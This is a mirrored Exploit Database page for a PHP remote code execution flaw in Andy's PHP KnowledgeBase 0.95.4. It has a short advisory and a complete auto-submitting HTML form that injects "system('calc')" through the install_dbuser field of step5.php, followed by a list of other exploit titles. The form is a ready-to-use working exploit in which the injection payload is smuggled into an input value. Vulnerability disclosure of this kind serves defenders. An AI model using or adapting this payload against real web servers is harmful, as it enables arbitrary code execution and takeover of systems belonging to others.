Andy’s PHP KnowledgeBase 0.95.4 – ‘step5.php’ PHP Remote Code Execution

Exploit Database
92 阅读

作者： AutoSec Tools

日期： 2011-05-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35783/

source: https://www.securityfocus.com/bid/47918/info

Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected. 

<html>
<body onload="document.forms[0].submit()"> 
<form method="POST" action="http://localhost/aphpkb/install/step5.php">
<input type="hidden" name="install_dbuser" value="');system('calc');//" /> 
<input type="submit" name="submit" /> 
</form> 
</body>
</html>

last Exploits
Andy’s PHP KnowledgeBase 0.95.4 – ‘step5.php’ PHP Remote Code Execution的更多信息

School Event Management System 1.0 – Arbitrary File Upload：
Joomla! Component com_ice – Blind SQL Injection：
PHP Real Estate Script – SQL Injection：
phpMyAdmin 4.9.0.1 – Cross-Site Request Forgery：
Technicolor TC7200 – Credentials Disclosure：
WordPress Plugin eShop 6.2.8 – Multiple Cross-Site Scripting Vulnerabilities：
MySQLDumper 1.24.4 – ‘index.php?page’ Cross-Site Scripting：
OpenEMR 5.0.1 – ‘controller’ Remote Code Execution：